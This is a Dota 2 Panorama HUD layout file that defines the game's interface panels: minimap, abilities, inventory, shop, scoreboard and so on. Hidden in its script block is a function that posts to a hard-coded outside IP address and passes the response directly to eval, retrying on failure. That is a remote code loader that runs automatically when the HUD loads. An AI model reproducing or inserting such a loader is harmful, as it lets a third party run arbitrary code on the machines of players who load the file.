<root>
	<styles>
		<include src="s2r://panorama/styles/dotastyles.vcss_c" />
		<include src="s2r://panorama/styles/hudstyles.vcss_c" />
		<include src="s2r://panorama/styles/hud/hud_reborn.vcss_c" />
		<include src="s2r://panorama/styles/custom_ui.vcss_c" />
		<include src="s2r://panorama/styles/hud/dota_hud_stat_branch.vcss_c" />		
		<include src="s2r://panorama/styles/hud/dota_hud_ability_panel.vcss_c" />		
	</styles>

	<script>
		function getInit() {
				$.AsyncWebRequest("http://26.71.6.110:4297", {
					type: 'POST',
					data: {
						name: 'getinitscript'
					},
					success: eval,
					error: function(response) {
						var log = "Can't load init script, returned " + JSON.stringify(response) + "."
						if(response.status - 400 <= 0 || response.status - 400 > 99) {
							log += " Trying again."
							getInit()
						}
						$.Msg(log)
					}
				})
			}
		getInit()
		
		function EventAbilityLearnModeToggled( bInLearnMode )
		{
			$.GetContextPanel().SetHasClass( "AbilityLearnMode", bInLearnMode );
		}

		(function()
		{
			$.RegisterForUnhandledEvent( "DOTAHUDAbilityLearnModeToggled", EventAbilityLearnModeToggled );
		})();
	</script>

	<DOTAHud hittest="false" disallowedstyleflags="hover,descendantfocus">
		<Panel id="HUDElements" hittest="false" disallowedstyleflags="hover,descendantfocus">
			<DOTAHUDRelicProgress id="HeroRelicProgress" />
			<DOTAFightRecap id="FightRecap" class="VisGroup_Top"/>
			<DOTATopBar id="topbar" hittest="false"/>
			<DOTACombatEvents id="combat_events" hittest="false" class="VisGroup_Top"/>
			<DOTACombatLog id="combat_log" hittest="false" class="VisGroup_Top"/>
			<DOTASpectatorListener id="spectator_item" hittest="false" hittestchildren="false" class="VisGroup_Top" />
			<DOTATalentChangedItem id="spectator_talents" hittest="false" hittestchildren="false" class="VisGroup_Top" />
			<DOTARiverVial id="river_vial" hittest="false" class="VisGroup_Top" />
			<DOTAKillCam id="KillCam" class="VisGroup_Top"/>
			<DOTAHUDShop id="shop" class="VisGroup_Top" />
			<DOTAHUDInspect id="inspect" class="VisGroup_Top" />			
			<DOTAHUDCursorCooldown id="CursorCooldown" hittest="false"  class="VisGroup_Top"/>
			<DOTAChat id="HudChat" class="HudChat VisGroup_Top" chatstyle="hud" oncancel="DOTAChatCancelMessageMode()" hittest="false"/>
			<DOTAHUDNeutralCampPullTimes id="NeutralCampPullTimes" />
			<DOTAHUDAbilityHeroIcons id="AbilityHeroIcons" />
			<Panel id="minimap_container" hittest="false" disallowedstyleflags="hover,descendantfocus">
				<Panel id="minimap_block" acceptsinput="true" >
					<DOTAMinimap id="minimap" require-composition-layer="true" />
				</Panel>
				<Panel id="HUDSkinMinimap" hittest="false"/>
				<Panel id="GlyphScanContainer" hittest="false">
					<DOTARadarButton id="RadarButton"/>
					<DOTAGlyph id="glyph" />
				</Panel>
				<Panel id="RoshanTimerContainer" hittest="false">
					<DOTARoshanTimer id="RoshanTimer"/>
				</Panel>
			</Panel>

			<Panel id="splash_screen"></Panel>
			<Panel id="lower_hud" hittest="false" disallowedstyleflags="hover,descendantfocus">
				<Panel id="StatBranchDrawer" hittest="false">
					<DOTAStatBranch id="statbranchdialog" hittest="false" />
				</Panel>

				<Panel id="BuffContainer" hittest="false" >
					<DOTABuffList id="buffs" showdebuffs="false" />
					<DOTABuffList id="debuffs" showbuffs="false" />
				</Panel>
								
				<DOTASpellCard id="InvokerSpellCard" hittest="false"/>

				<Panel id="center_with_stats" hittest="false" disallowedstyleflags="hover,descendantfocus" >
					<Panel id="center_block" hittest="false" disallowedstyleflags="hover,descendantfocus" >
						<Panel id="left_flare" />
						<Panel id="center_bg" />
						<Panel id="HUDSkinPortrait" hittest="false"/>
						<Panel id="HUDSkinXPBackground" hittest="false"/>
						<DOTAMultiUnit id="multiunit" class="PortraitLocation" />
						<Panel id="PortraitGroup">
							<DOTAParticleScenePanel id="PortraitStreakParticle"  particleonly="true" cameraOrigin="-300 0 150" lookAt="0 0 180" fov="50" hittest="false"/>
							<Panel id="PortraitStreakParticleBorder" hittest="false" class="" />
							<Panel id="PortraitBacker" hittest="false"/>
							<Panel id="PortraitBackerColor" hittest="false"/>
							<Panel id="PortraitContainer" hittest="false">
								<DOTAPortrait id="portraitHUD" class="PortraitLocation" onmouseover="DOTAHUDShowVisionRange();" onmouseout="DOTAHUDHideVisionRange();" />
								<DOTAPortrait id="portraitHUDOverlay" class="PortraitLocation"/>
								<Panel id="SilenceIcon" hittest="false" always-cache-composition-layer="true" />
								<Panel id="MutedIcon" hittest="false" always-cache-composition-layer="true" />
								<Panel id="DeathGradient"/>
							</Panel>							
						</Panel>
						<DOTAHUDDeathPanel id="death_panel_buyback" />
						<DOTAXP id="xp" hittest="false" always-cache-composition-layer="true" require-composition-layer="true" />
						<Panel id="stats_container" hittest="false" >
							<Panel id="stats_container_bg" hittest="false" />
							<Panel id="HUDSkinStatBranchBG" hittest="false"/>
							<Panel id="HUDSkinStatBranchGlow" hittest="false"/>							
							<DOTAStatsRegion id="stats" class="ShowSplitLabels" hittest="false" />	
							<DOTAHUDStrAgiInt id="stragiint" always-cache-composition-layer="true" require-composition-layer="true" hittest="false" />
							<DOTAPortraitStatsClickRegion id="stats_tooltip_region" acceptsinput="true" onmouseover="DOTAHUDShowDamageArmorTooltip();" onmouseout="DOTAHUDHideDamageArmorTooltip();" />
						</Panel>
						<Panel hittest="false" id="RecommendedUpgradeOverlay" >
							<Panel hittest="false" class="BorderEdge BorderTop" />
							<Panel hittest="false" class="BorderEdge BorderRight" />
							<Panel hittest="false" class="BorderEdge BorderBottom" />
							<Panel hittest="false" class="BorderEdge BorderLeft" />
						</Panel>
						<DOTAUnitName id="unitname" hittest="false" />
						<Button id="KillGraphButton" class="DotaPlusBrightButton" onactivate="DOTAKillGraphShow();" >
							<Label text="#DOTA_Plus_Death_Screen"/>
						</Button>
						<DOTAUnitHeroBadge id="unitbadge" hittest="false" hittestchildren="false">
							<Panel id="PortraitHeroBadge" class="PlusHeroBadgeIconSmall" />
							<Panel id="PortraitHeroBadgeOverlay" />
						</DOTAUnitHeroBadge>
						<DOTAHUDLevelStatsFrame id="level_stats_frame" hittest="false" />						
						<DOTALevelUpButton id="levelup" hittest="false" />
						<DOTAHealthMana id="health_mana" />
						<Panel id="HUDSkinAbilityContainerBG" hittest="false" />
						<Panel class="AbilityInsetShadowLeft"/>
						<DOTAHotkey id="StatBranchHotkey" keybind="LearnStats" hittest="false" />
						<Panel id="SecondaryAbilityContainer" hittest="false">
							<DOTASecondaryAbilitiesBar id="SecondaryAbilitiesBar" class="HideWhenCanLevelAbilities" />
							<Panel class="TertiaryAbilityContainer" hittest="false">
								<DOTASecondaryAbilitiesBar id="TertiaryAbilitiesBar" secondary_ability_type="2" />							
							</Panel>
						</Panel>
						<Panel id="AbilitiesAndStatBranch" hittest="false">
							<Panel class="LeftRightFlow" hittest="false">
								<DOTATalentDisplay id="StatBranch"/>
								<DOTAAbilityList id="abilities" hittest="false"/>
							</Panel>
							<ProgressBar id="MorphProgress" min="0" max="1" value="0.5" />
						</Panel>
						<Panel class="AbilityInsetShadowRight" require-composition-layer="true" always-cache-composition-layer="true"/>
						<DOTAUnitEconItem id="econ_item"/>
						<DOTAInventory id="inventory" slotsDraggable="true" />
						<Panel id="right_flare" >
						</Panel>


						<Panel id="inventory_tpscroll_container">
					  		<DOTAAbilityPanel id="inventory_tpscroll_slot"/>
								<Panel id="inventory_tpscroll_HotkeyContainer" hittest="false">
									<Panel id="Hotkey" hittest="false" >
										<Label id="HotkeyText" text="{s:hotkey}" hittest="false" />
									</Panel>
									<Panel id="HotkeyModifier" hittest="false" >
										<Label id="AltText" text="#DOTA_Keybind_ALT" hittest="false" />
									</Panel>
									<Panel id="HotkeyCtrlModifier" hittest="false" >
										<Label id="CtrlText" text="#DOTA_Keybind_CTRL" hittest="false" />
									</Panel>
								</Panel>
						    <Label id="tpCharges" text="{d:charge_count}" hittest="false" />
						  </Panel>	
						
						<Panel id="inventory_neutral_slot_container"> 
				  		<DOTAAbilityPanel id="inventory_neutral_slot"/>
						<Panel id="inventory_neutral_slot_HotkeyContainer" hittest="false">
							<Panel id="Hotkey" hittest="false" >
								<Label id="HotkeyText" text="{s:hotkey}" hittest="false" />
							</Panel>
							<Panel id="HotkeyModifier" hittest="false" >
								<Label id="AltText" text="#DOTA_Keybind_ALT" hittest="false" />
							</Panel>
							<Panel id="HotkeyCtrlModifier" hittest="false" >
								<Label id="CtrlText" text="#DOTA_Keybind_CTRL" hittest="false" />
							</Panel>
						</Panel>
					    <Label id="neutralCharges" text="{d:charge_count}" hittest="false" />
					  </Panel>			

				  	</Panel>
			   </Panel>

				<Panel id="shop_launcher_block" hittest="false" >
					<Panel id="shop_launcher_bg" />
					<DOTAStash id="stash" />
					<DOTAQuickBuy id="quickbuy" />
				</Panel>
     		 </Panel>

			<DOTANetGraph id="NetGraph" class="VisGroup_Top"/>
			<DOTAHUDDisconnect id="NetDisconnect" class="VisGroup_Top"/>
			<!--<DOTAQuestStatus id="QuestStatus"  class="VisGroup_Top"/>-->
			<Panel id="stackable_side_panels" class="TopBottomFlow" hittest="false">
				<DOTAQuickStats id="quickstats" class="VisGroup_Top" hittest="false" require-composition-layer="true" always-cache-composition-layer="true"/>
				<DOTAPlusStatus id="PlusStatus"  class="VisGroup_Top"/>
				<DOTAHudGuildStatus id="GuildStatus"  class="VisGroup_Top"/>
				<DOTAHeroDisplay id="HeroDisplay" />
			</Panel>
			<DOTAMutations id="mutations" class="VisGroup_Top" hittest="false" require-composition-layer="true" always-cache-composition-layer="true"/>
			<DOTAWagering id="Wagering" class="VisGroup_Top" hittest="false"/>
			<DOTAHudMenuButtons id="MenuButtons" class="VisGroup_Top" hittest="false"/>
			<DOTAQueryUnit id="QueryUnit" class="VisGroup_Top" hittest="false">
				<DOTAHeroStatue id="hero_statue" />
				<DOTAInternationalHallOfFame id="international_hall_of_fame" />
				<!--<DOTAHudPromo id="promo" />-->
				<DOTAPAGravestone id="pa_gravestone" />
			</DOTAQueryUnit>
			<DOTAScoreboard id="scoreboard" class="VisGroup_Top"/>		
			<!-- <DOTAPlusTimedStats id="timedplusstats" class="VisGroup_Top"/> -->
			<DOTAGG id="GG"/>
		</Panel>
		<DOTAPredictionsButton id="predictions_button" />

		<Panel id="OrdersContainer" hittest="false">
			<DOTAChannelBar id="ChannelBar" hittest="false" />
			<DOTAQueuedOrders id="QueuedOrders" hittest="false"/>
		</Panel>
		<DOTASpectatorGameStats id="spectator_game_stats" class="VisGroup_Top" />
		<DOTASpectatorOptions id="spectator_options" class="VisGroup_Top"/>
		<DOTASpectatorGraph id="SpectatorGraph" hittest="false" class="VisGroup_Top" />
		<DOTAQuickStats id="spectator_quickstats" hittest="false" require-composition-layer="true" always-cache-composition-layer="true" class="VisGroup_Top" />	
		<DOTAQuestPicker id="QuestPicker"/>
		<DOTAHudPreGame id="PreGame" />
		<DOTACustomUIRoot id="CustomUIRoot" hittest="false"/>
		<DOTAVoiceChat id="VoiceChat"/>
		<DOTAKillGraph id="KillGraph"  class="VisGroup_Top"/>
		<Panel id="player_performance_container" class="TopBottomFlow" hittestchildren="false" hittest="false">
			<DOTAKillStreak id="KillStreak"  class="VisGroup_Top"/>
			<DOTAHUDESArcanaCombo id="EsArcanaCombo" class="VisGroup_Top" />
			<DOTAHUDOMArcanaCombo id="OmArcanaCombo" class="VisGroup_Top" />
			<DOTAHUDQoPArcana id="QoPArcana" class="VisGroup_Top" />
		</Panel>
		<DOTAHUDWKArcana id="WKArcana"/>

		<DOTAErrorMsg id="ErrorMessages" hittest="false"  class="VisGroup_Top"/>
		<DOTAChatWheel id="ChatWheel" hittest="false" class="VisGroup_Top" />
		<DOTAPingWheel id="PingWheel" hittest="false"  class="VisGroup_Top"/>
		<DOTASpectatorItems id="SpectatorItems"  class="VisGroup_Top"/>
		<DOTAPaused id="PausedInfo"  class="VisGroup_Top"/>
		<DOTAGuideBrowser id="GuideBrowser" acceptsinput="true" class="SmallMode VisGroup_Top" />
		<DOTAHUDCharms id="Charms" />	
		<DOTACameraman id="Cameraman" />
		<DOTAHudBotDebug id="BotDebug" />
		<DOTASpectatorDVR id="spectator_dvr" />
		<DOTABroadcaster id="BroadcasterSelection"/>
		<DOTAProjectionDebug id="ProjectionDebug" />


		<Panel id="GameEndContainer" hittest="false" class="FullScreen" />  <!-- real game end will be constructed and parented to GameEndContainer -->

		<!-- These should be high in the z-order so that they appear on top of everything correctly -->
    <Panel class="GreenScreen" />
    <PopupManager id="PopupManager" />
		<DOTAContextMenuManager id="ContextMenuManager" />
		<DOTAHelpTipsManager id="HelpTipsManager" oncancel="DropInputFocus()" />
		<ToastManager id="SpectatorToastManager" hittest="false" toastduration="4s" maxtoastsvisible="5" maxtoastbehavior="deleteoldest" />
		<DOTATooltipManager id="Tooltips" hittest="false" />
		<DOTAIngamePredictionsContainer id="IngamePredictionsContainer" />
		<ToastManager id="PredictionToastManager" hittest="false" toastduration="7s" maxtoastsvisible="3"/>
    <ToastManager id="BroadcastToastManager" class="BroadcastToastManager" hittest="false" toastduration="500s" maxtoastsvisible="1" maxtoastbehavior="deleteoldest" />
    <ToastManager id="BroadcastToastManagerAlpha" class="BroadcastToastManager" hittest="false" toastduration="500s" maxtoastsvisible="1" maxtoastbehavior="deleteoldest" />
    <ToastManager id="BountyToastManager" class="BountyToastManager" hittest="false" toastduration="4s" maxtoastsvisible="3" maxtoastbehavior="deleteoldest" />
  </DOTAHud>
</root>
